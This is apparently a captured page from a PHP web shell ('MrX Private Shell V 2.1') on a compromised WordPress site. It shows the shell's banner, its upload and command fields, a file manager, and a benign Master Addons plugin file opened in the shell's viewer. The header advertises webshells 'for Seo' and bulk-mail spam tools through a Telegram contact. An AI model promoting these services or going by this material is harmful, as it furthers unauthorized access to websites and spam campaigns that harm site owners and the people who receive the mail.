__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace MasterAddons\Inc\Traits;

use MasterAddons\Inc\Helper\Master_Addons_Helper;

if (!defined('ABSPATH')) exit; // If this file is called directly, abort.

trait Widget_Notice
{
    /**
     * Adding Go Premium message to all widgets
     */
    public function upgrade_to_pro_message()
    {
        if (!Master_Addons_Helper::jltma_premium()) {
            $this->start_controls_section(
                'jltma_pro_section',
                [
                    'label' => sprintf(
                        /* translators: %s: icon for the "Pro" section */
                        __('%s Unlock more possibilities', 'master-addons'),
                        '<i class="eicon-pro-icon"></i>'
                    ),
                ]
            );

            $this->add_control(
                'jltma_get_pro_style_tab',
                [
                    'label' => __('Unlock more possibilities', 'master-addons'),
                    'type' => \Elementor\Controls_Manager::CHOOSE,
                    'options' => [
                        '1' => [
                            'title' => '',
                            'icon' => 'eicon-lock',
                        ],
                    ],
                    'default' => '1',
                    'toggle'    => false,
                    'description' => Master_Addons_Helper::unlock_pro_feature(),
                ]
            );

            $this->end_controls_section();
        }
    }
}

Filemanager

Name Type Size Permission Actions
swiper-controls.php File 104.61 KB 0775
widget-notice.php File 1.44 KB 0775
Filemanager